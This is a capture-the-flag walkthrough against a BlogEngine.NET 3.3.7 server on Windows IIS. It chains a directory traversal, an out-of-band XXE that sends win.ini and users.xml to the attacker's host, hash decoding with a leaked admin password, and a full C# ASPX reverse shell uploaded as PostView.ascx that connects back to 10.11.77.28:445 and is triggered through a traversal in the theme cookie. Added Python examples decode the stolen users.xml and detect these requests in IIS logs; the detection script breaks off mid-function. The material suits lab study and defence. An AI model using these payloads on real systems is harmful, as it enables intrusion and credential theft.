Port scanning

The target machine does not respond to ping.

└─# nmap --min-rate=10000 -p- exf.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-05 16:39 UTC
Nmap scan report for exf.thm (10.10.65.115)
Host is up (0.0036s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
5985/tcp open wsman
MAC Address: 02:D8:FF:08:7D:81 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 20.30 seconds
└─# nmap -sC -sT -sV -O -p80,3389,5985 exf.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-05 16:40 UTC
Nmap scan report for exf.thm (10.10.65.115)
Host is up (0.00049s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: 403 - Forbidden: Access is denied.
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=EXFILIBUR
| Not valid before: 2024-06-04T16:19:34
|_Not valid after: 2024-12-04T16:19:34
|_ssl-date: 2024-06-05T16:41:16+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: EXFILIBUR
| NetBIOS_Domain_Name: EXFILIBUR
| NetBIOS_Computer_Name: EXFILIBUR
| DNS_Domain_Name: EXFILIBUR
| DNS_Computer_Name: EXFILIBUR
| Product_Version: 10.0.17763
|_ System_Time: 2024-06-05T16:41:11+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
MAC Address: 02:D8:FF:08:7D:81 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.88 seconds
└─# nmap --script=vuln -p80,3389,5985 exf.thm 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-05 16:45 UTC
Nmap scan report for exf.thm (10.10.65.115)
Host is up (0.00032s latency).

PORT STATE SERVICE
80/tcp open http
| http-enum:
|_ /blog/: Blog
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3389/tcp open ms-wbt-server
5985/tcp open wsman
MAC Address: 02:D8:FF:08:7D:81 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 140.60 seconds

Reading Users

This is a Windows host running IIS; the web root returns 403. The nmap results include a /blog path that is accessible.

The most noticeable thing is a login page. The application is BlogEngine.NET, and its version, 3.3.7, can be found in the homepage source.

└─$ searchsploit blogengine                                 
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection | xml/webapps/48422.txt
BlogEngine 3.3 - XML External Entity Injection | windows/webapps/46106.txt
BlogEngine 3.3.8 - 'Content' Stored XSS | aspx/webapps/48999.txt
BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting | asp/webapps/32874.txt
BlogEngine.NET 1.6 - Directory Traversal / Information Disclosure | asp/webapps/35168.txt
BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution | aspx/webapps/46353.cs
BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Directory Traversal / Remote Code Execution | aspx/webapps/47010.py
BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal | aspx/webapps/47035.py
BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code Execution | aspx/webapps/47011.py
BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection | aspx/webapps/47014.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Directory traversal, RCE and XXE are likely. According to 47035.py, /api/filemanager has a directory traversal that allows file reading; reading the root directory:

http://exf.thm/blog/api/filemanager?path=/../../

<ArrayOfFileInstance>
<FileInstance>
<Created>6/6/2024 4:20:23 AM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files../..</FullPath>
<IsChecked>false</IsChecked>
<Name>...</Name>
<SortOrder>0</SortOrder>
</FileInstance>
<FileInstance>
<Created>8/9/2023 2:57:57 PM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files../../blogs</FullPath>
<IsChecked>false</IsChecked>
<Name>blogs</Name>
<SortOrder>1</SortOrder>
</FileInstance>
<FileInstance>
<Created>8/9/2023 2:57:57 PM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files../../datastore</FullPath>
<IsChecked>false</IsChecked>
<Name>datastore</Name>
<SortOrder>2</SortOrder>
</FileInstance>
<FileInstance>
<Created>8/9/2023 6:41:39 PM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files../../files</FullPath>
<IsChecked>false</IsChecked>
<Name>files</Name>
<SortOrder>3</SortOrder>
</FileInstance>
<FileInstance>
<Created>6/6/2024 4:19:12 AM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files../../machine.config</FullPath>
<IsChecked>false</IsChecked>
<Name>machine.config</Name>
<SortOrder>4</SortOrder>
</FileInstance>
<FileInstance>
<Created>8/9/2023 2:57:57 PM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files../../monstercache</FullPath>
<IsChecked>false</IsChecked>
<Name>monstercache</Name>
<SortOrder>5</SortOrder>
</FileInstance>
<FileInstance>
<Created>8/11/2023 10:54:51 AM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files../../pages</FullPath>
<IsChecked>false</IsChecked>
<Name>pages</Name>
<SortOrder>6</SortOrder>
</FileInstance>
<FileInstance>
<Created>8/9/2023 2:57:57 PM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files../../posts</FullPath>
<IsChecked>false</IsChecked>
<Name>posts</Name>
<SortOrder>7</SortOrder>
</FileInstance>
<FileInstance>
<Created>8/9/2023 2:57:57 PM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files../../profiles</FullPath>
<IsChecked>false</IsChecked>
<Name>profiles</Name>
<SortOrder>8</SortOrder>
</FileInstance>
<FileInstance>
<Created>6/6/2024 4:17:31 AM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files../../web.config</FullPath>
<IsChecked>false</IsChecked>
<Name>web.config</Name>
<SortOrder>9</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>738.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>../../blogroll.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>blogroll.xml</Name>
<SortOrder>10</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>300.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>../../blogs.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>blogs.xml</Name>
<SortOrder>11</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>240.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>../../categories.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>categories.xml</Name>
<SortOrder>12</SortOrder>
</FileInstance>
<FileInstance>
<Created>8/9/2023 5:35:12 PM</Created>
<FileSize>3.50 kb</FileSize>
<FileType>File</FileType>
<FullPath>../../customfields.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>customfields.xml</Name>
<SortOrder>13</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>61.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>../../extensionmap.txt</FullPath>
<IsChecked>false</IsChecked>
<Name>extensionmap.txt</Name>
<SortOrder>14</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>11.86 kb</FileSize>
<FileType>File</FileType>
<FullPath>../../labels.txt</FullPath>
<IsChecked>false</IsChecked>
<Name>labels.txt</Name>
<SortOrder>15</SortOrder>
</FileInstance>
<FileInstance>
<Created>8/9/2023 5:35:09 PM</Created>
<FileSize>42.89 kb</FileSize>
<FileType>File</FileType>
<FullPath>../../logger.txt</FullPath>
<IsChecked>false</IsChecked>
<Name>logger.txt</Name>
<SortOrder>16</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>19.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>../../newsletter.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>newsletter.xml</Name>
<SortOrder>17</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>109.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>../../packagefiles.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>packagefiles.xml</Name>
<SortOrder>18</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>101.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>../../packages.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>packages.xml</Name>
<SortOrder>19</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>554.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>../../pingservices.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>pingservices.xml</Name>
<SortOrder>20</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>4.20 kb</FileSize>
<FileType>File</FileType>
<FullPath>../../rights.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>rights.xml</Name>
<SortOrder>21</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>388.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>../../roles.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>roles.xml</Name>
<SortOrder>22</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>5.47 kb</FileSize>
<FileType>File</FileType>
<FullPath>../../settings.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>settings.xml</Name>
<SortOrder>23</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>587.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>../../stopwords.txt</FullPath>
<IsChecked>false</IsChecked>
<Name>stopwords.txt</Name>
<SortOrder>24</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>633.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>../../users.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>users.xml</Name>
<SortOrder>25</SortOrder>
</FileInstance>
</ArrayOfFileInstance>

Accessing /../../App_Data/:

<ArrayOfFileInstance>
<FileInstance>
<Created>6/6/2024 5:22:28 AM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files/../../App_Data</FullPath>
<IsChecked>false</IsChecked>
<Name>...</Name>
<SortOrder>0</SortOrder>
</FileInstance>
<FileInstance>
<Created>6/6/2024 4:57:59 AM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files/../../App_Data/App_Data</FullPath>
<IsChecked>false</IsChecked>
<Name>App_Data</Name>
<SortOrder>1</SortOrder>
</FileInstance>
<FileInstance>
<Created>8/9/2023 2:57:57 PM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files/../../App_Data/blogs</FullPath>
<IsChecked>false</IsChecked>
<Name>blogs</Name>
<SortOrder>2</SortOrder>
</FileInstance>
<FileInstance>
<Created>8/9/2023 2:57:57 PM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files/../../App_Data/datastore</FullPath>
<IsChecked>false</IsChecked>
<Name>datastore</Name>
<SortOrder>3</SortOrder>
</FileInstance>
<FileInstance>
<Created>8/9/2023 6:41:39 PM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files/../../App_Data/files</FullPath>
<IsChecked>false</IsChecked>
<Name>files</Name>
<SortOrder>4</SortOrder>
</FileInstance>
<FileInstance>
<Created>6/6/2024 4:19:12 AM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files/../../App_Data/machine.config</FullPath>
<IsChecked>false</IsChecked>
<Name>machine.config</Name>
<SortOrder>5</SortOrder>
</FileInstance>
<FileInstance>
<Created>8/9/2023 2:57:57 PM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files/../../App_Data/monstercache</FullPath>
<IsChecked>false</IsChecked>
<Name>monstercache</Name>
<SortOrder>6</SortOrder>
</FileInstance>
<FileInstance>
<Created>8/11/2023 10:54:51 AM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files/../../App_Data/pages</FullPath>
<IsChecked>false</IsChecked>
<Name>pages</Name>
<SortOrder>7</SortOrder>
</FileInstance>
<FileInstance>
<Created>8/9/2023 2:57:57 PM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files/../../App_Data/posts</FullPath>
<IsChecked>false</IsChecked>
<Name>posts</Name>
<SortOrder>8</SortOrder>
</FileInstance>
<FileInstance>
<Created>8/9/2023 2:57:57 PM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files/../../App_Data/profiles</FullPath>
<IsChecked>false</IsChecked>
<Name>profiles</Name>
<SortOrder>9</SortOrder>
</FileInstance>
<FileInstance>
<Created>6/6/2024 4:17:31 AM</Created>
<FileSize/>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files/../../App_Data/web.config</FullPath>
<IsChecked>false</IsChecked>
<Name>web.config</Name>
<SortOrder>10</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>738.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>/../../App_Data/blogroll.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>blogroll.xml</Name>
<SortOrder>11</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>300.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>/../../App_Data/blogs.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>blogs.xml</Name>
<SortOrder>12</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>240.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>/../../App_Data/categories.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>categories.xml</Name>
<SortOrder>13</SortOrder>
</FileInstance>
<FileInstance>
<Created>8/9/2023 5:35:12 PM</Created>
<FileSize>3.50 kb</FileSize>
<FileType>File</FileType>
<FullPath>/../../App_Data/customfields.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>customfields.xml</Name>
<SortOrder>14</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>61.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>/../../App_Data/extensionmap.txt</FullPath>
<IsChecked>false</IsChecked>
<Name>extensionmap.txt</Name>
<SortOrder>15</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>11.86 kb</FileSize>
<FileType>File</FileType>
<FullPath>/../../App_Data/labels.txt</FullPath>
<IsChecked>false</IsChecked>
<Name>labels.txt</Name>
<SortOrder>16</SortOrder>
</FileInstance>
<FileInstance>
<Created>8/9/2023 5:35:09 PM</Created>
<FileSize>45.48 kb</FileSize>
<FileType>File</FileType>
<FullPath>/../../App_Data/logger.txt</FullPath>
<IsChecked>false</IsChecked>
<Name>logger.txt</Name>
<SortOrder>17</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>19.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>/../../App_Data/newsletter.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>newsletter.xml</Name>
<SortOrder>18</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>109.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>/../../App_Data/packagefiles.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>packagefiles.xml</Name>
<SortOrder>19</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>101.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>/../../App_Data/packages.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>packages.xml</Name>
<SortOrder>20</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>554.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>/../../App_Data/pingservices.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>pingservices.xml</Name>
<SortOrder>21</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>4.20 kb</FileSize>
<FileType>File</FileType>
<FullPath>/../../App_Data/rights.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>rights.xml</Name>
<SortOrder>22</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>388.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>/../../App_Data/roles.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>roles.xml</Name>
<SortOrder>23</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>5.47 kb</FileSize>
<FileType>File</FileType>
<FullPath>/../../App_Data/settings.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>settings.xml</Name>
<SortOrder>24</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>587.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>/../../App_Data/stopwords.txt</FullPath>
<IsChecked>false</IsChecked>
<Name>stopwords.txt</Name>
<SortOrder>25</SortOrder>
</FileInstance>
<FileInstance>
<Created>2/5/2019 5:47:20 PM</Created>
<FileSize>633.00 bytes</FileSize>
<FileType>File</FileType>
<FullPath>/../../App_Data/users.xml</FullPath>
<IsChecked>false</IsChecked>
<Name>users.xml</Name>
<SortOrder>26</SortOrder>
</FileInstance>
</ArrayOfFileInstance>

https://www.securitymetrics.com/blog/blogenginenet-xml-external-entity-attacks

Following this write-up, the XXE can be used as an arbitrary file read to retrieve users.xml. First, try reading win.ini.

First, create an oob.xml that fetches exfil.dtd from our host:

<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://$LHOST/exfil.dtd">
<foo>&e1;</foo>

Create exfil.dtd locally:

<!ENTITY % p1 SYSTEM "file:///C:/WINDOWS/win.ini">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://$LHOST/EX?%p1;'>">
%p2;

Then, after starting a web server locally:

curl 'http://exf.thm/blog/syndication.axd?apml=http://$LHOST/oob.xml'

But it reports that it cannot reach the remote host. The room hint mentions a "brickwall", so there is probably a firewall; after moving the listener to port 445 there is a callback:

10.10.126.190 - - [06/Jun/2024 11:31:59] "GET /oob.xml HTTP/1.1" 200 -
10.10.126.190 - - [06/Jun/2024 11:31:59] "GET /exfil.dtd HTTP/1.1" 200 -
10.10.126.190 - - [06/Jun/2024 11:32:00] code 404, message File not found
10.10.126.190 - - [06/Jun/2024 11:32:00] "GET /EX?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1 HTTP/1.1" 404 -

The read succeeded. Modify exfil.dtd to read users.xml instead ($BLOG_ROOT is a placeholder for the blog's on-disk path, which is not shown in this write-up):

<!ENTITY % p1 SYSTEM "file:///$BLOG_ROOT/App_Data/users.xml">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://$LHOST/EX?%p1;'>">
%p2;

URL-decoding the result gives:

<Users>
<User>
<UserName>Admin</UserName>
<Password>wobS/AvKFPT5qP9FgQyh7C kc k 1rBzbOf7Oxfptw0=</Password>
<Email>post@example.com</Email>
<LastLoginTime>2007-12-05 20:46:40</LastLoginTime>
</User>
<!--
<User>
<UserName>merlin</UserName>
<Password></Password>
<Email>mark@email.com</Email>
<LastLoginTime>2023-08-11 10:58:51</LastLoginTime>
</User>
-->
<User>
<UserName>guest</UserName>
<Password>hJg8YPfarcHLhphiH4AsDZ aPDwpXIEHSPsEgRXBhuw=</Password>
<Email>guest@email.com</Email>
<LastLoginTime>2023-08-12 08:47:51</LastLoginTime>
</User>
</Users>

One catch: URL decoding also turns "+" into a space, so the spaces have to be replaced back with "+".

Then base64-decode and convert to hex.

admin

└─$ echo -n  'wobS/AvKFPT5qP9FgQyh7C+kc+k+1rBzbOf7Oxfptw0=' |base64 -d |xxd -p -c 32
c286d2fc0bca14f4f9a8ff45810ca1ec2fa473e93ed6b0736ce7fb3b17e9b70d

guest

└─$ echo -n 'hJg8YPfarcHLhphiH4AsDZ+aPDwpXIEHSPsEgRXBhuw=' |base64 -d |xxd -p -c 32
84983c60f7daadc1cb8698621f802c0d9f9a3c3c295c810748fb048115c186ec

The guest hash cracks to the password "guest".
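Added example (Python, not part of the original write-up): decoding the exfiltrated users.xml with percent-decoding only, which keeps the base64 "+" intact instead of turning it into the spaces seen above, and then checking what kind of hash the store holds. CAPTURED_QUERY is a constructed sample in the shape of the GET /EX? line from the listener log; the two hash values are the ones on this page.

```python
"""Decode the users.xml that the out-of-band XXE above delivers in the
listener's query string, avoiding the '+' -> space corruption the writeup
hit, and check what kind of hash BlogEngine.NET stored.

Added example, not from the original writeup. CAPTURED_QUERY is a constructed
stand-in for the text after "GET /EX?" in the web server log; the two hashes
are the ones shown on the page (the commented-out merlin entry is omitted).
"""
import base64
import hashlib
import xml.etree.ElementTree as ET
from urllib.parse import unquote, unquote_plus

CAPTURED_QUERY = (
    "%3CUsers%3E%0D%0A%3CUser%3E%0D%0A%3CUserName%3EAdmin%3C/UserName%3E%0D%0A"
    "%3CPassword%3EwobS/AvKFPT5qP9FgQyh7C+kc+k+1rBzbOf7Oxfptw0=%3C/Password%3E%0D%0A"
    "%3C/User%3E%0D%0A%3CUser%3E%0D%0A%3CUserName%3Eguest%3C/UserName%3E%0D%0A"
    "%3CPassword%3EhJg8YPfarcHLhphiH4AsDZ+aPDwpXIEHSPsEgRXBhuw=%3C/Password%3E%0D%0A"
    "%3C/User%3E%0D%0A%3C/Users%3E"
)


def percent_decode(query: str) -> str:
    """Undo only %XX escapes. unquote_plus() would also turn every '+' into a
    space, silently corrupting base64, where '+' is a digit."""
    return unquote(query)


def extract_hashes(users_xml: str) -> dict:
    """Map each UserName to the hex form of its base64-decoded Password."""
    hashes = {}
    for user in ET.fromstring(users_xml).iter("User"):
        b64 = (user.findtext("Password") or "").strip()
        if not b64:  # accounts with an empty <Password/> carry no hash
            continue
        hashes[user.findtext("UserName")] = base64.b64decode(b64, validate=True).hex()
    return hashes


def digest_kind(hex_digest: str) -> str:
    """Guess the hash family from its length; 32 bytes is SHA-256 sized."""
    return {32: "sha256", 20: "sha1", 16: "md5"}.get(len(hex_digest) // 2, "unknown")


def is_unsalted_sha256_of(hex_digest: str, candidate: str) -> bool:
    """True if the stored value is plain SHA-256 of candidate. A hit shows the
    store uses a fast, unsalted hash, so a leaked users.xml is an immediate
    credential exposure rather than a slow offline-cracking problem."""
    return hashlib.sha256(candidate.encode()).hexdigest() == hex_digest


if __name__ == "__main__":
    hashes = extract_hashes(percent_decode(CAPTURED_QUERY))
    for user, digest in hashes.items():
        print(f"{user}: {digest} ({digest_kind(digest)})")
    # The writeup's recovered guest password, used here only to confirm the format.
    print("guest is unsalted SHA-256('guest'):", is_unsalted_sha256_of(hashes["guest"], "guest"))
```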

Getshell

After logging in we are the guest user. From here a reverse shell can be uploaded through the file upload and triggered via the directory traversal in the cookie parameter.

See aspx/webapps/47011.py above.

This requires a user who can edit themes. In the lower right there is a draft post, which contains the password of kingarthy, who is also the admin: Excal1burP@ss1337

After switching to the admin user, an extra "CUSTOM" section appears in the left menu, and it contains themes.

Request:

POST /blog/api/upload?action=file HTTP/1.1
Host: exf.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/plain
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: XXX
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------12143974373743678091868871063
Content-Length: 2076

-----------------------------12143974373743678091868871063
Content-Disposition: form-data; filename="PostView.ascx"

<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">
static System.IO.StreamWriter streamWriter;

protected override void OnLoad(EventArgs e) {
base.OnLoad(e);

using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.11.77.28", 445)) {
using(System.IO.Stream stream = client.GetStream()) {
using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
streamWriter = new System.IO.StreamWriter(stream);

StringBuilder strInput = new StringBuilder();

System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();

while(true) {
strInput.Append(rdr.ReadLine());
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}

private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
StringBuilder strOutput = new StringBuilder();

if (!String.IsNullOrEmpty(outLine.Data)) {
try {
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
} catch (Exception err) { }
}
}
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>

-----------------------------12143974373743678091868871063--

Response:

HTTP/1.1 201 Created
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Thu, 06 Jun 2024 13:01:28 GMT
Connection: close
Content-Length: 72

"/blog/file.axd?file=%2f2024%2f06%2fPostView.ascx|PostView.ascx (1.8KB)"

Use the earlier directory traversal to check whether the upload succeeded:

└─$ curl 'http://exf.thm/blog/api/filemanager?path=/../../App_Data/files/2024/06/' 
[{"IsChecked":false,"SortOrder":0,"Created":"6/6/2024 1:05:58 PM","Name":"...","FileSize":"","FileType":0,"FullPath":"~/App_Data/files/../../App_Data/files/2024/06","ImgPlaceholder":""},{"IsChecked":false,"SortOrder":1,"Created":"6/6/2024 1:01:28 PM","Name":"PostView.ascx","FileSize":"1.85 kb","FileType":1,"FullPath":"/../../App_Data/files/2024/06/PostView.ascx","ImgPlaceholder":"fa fa-file-o"}]

Use the theme cookie directory traversal to trigger the reverse shell:

└─$ curl -b "theme=../../App_Data/files/2024/06" 'http://exf.thm/blog/'

We get a reverse shell as merlin.
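Added example (Python, not part of the original write-up): detection logic for the three request patterns this chain uses (filemanager path traversal, syndication.axd pointed at a remote APML document, and a ".." in the theme cookie), run over a constructed IIS W3C log excerpt. It assumes the optional cs(Cookie) field is logged, since the theme traversal is visible nowhere else; the client IP is the listener address from the page's payload, reused here as a constructed value.

```python
"""Flag in IIS W3C logs the three BlogEngine.NET request patterns this writeup
chains: filemanager path traversal, syndication.axd fetching a remote APML
document, and a '..' in the theme cookie.

Added example, not part of the original writeup. The log excerpt is constructed
and assumes the optional cs(Cookie) field is logged; the theme traversal is
visible nowhere else.
"""
import re
from urllib.parse import unquote

# Constructed W3C excerpt; field order follows the #Fields line, "-" is empty.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status c-ip cs(Cookie)
2024-06-06 04:20:23 GET /blog/ - 200 10.11.77.28 -
2024-06-06 04:21:10 GET /blog/api/filemanager path=/../../ 200 10.11.77.28 -
2024-06-06 04:22:05 GET /blog/api/filemanager path=%2f..%2f..%2fApp_Data%2f 200 10.11.77.28 -
2024-06-06 11:31:59 GET /blog/syndication.axd apml=http://10.11.77.28:445/oob.xml 200 10.11.77.28 -
2024-06-06 11:35:00 GET /blog/syndication.axd apml=/blog/apml.axd 200 10.11.77.28 -
2024-06-06 13:01:28 POST /blog/api/upload action=file 201 10.11.77.28 -
2024-06-06 13:05:58 GET /blog/ - 200 10.11.77.28 theme=../../App_Data/files/2024/06
2024-06-06 13:10:00 GET /blog/ - 200 10.11.77.28 theme=Standard
"""

# A ".." path segment bounded by separators or string ends.
DOTDOT_SEGMENT = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def has_traversal(value: str) -> bool:
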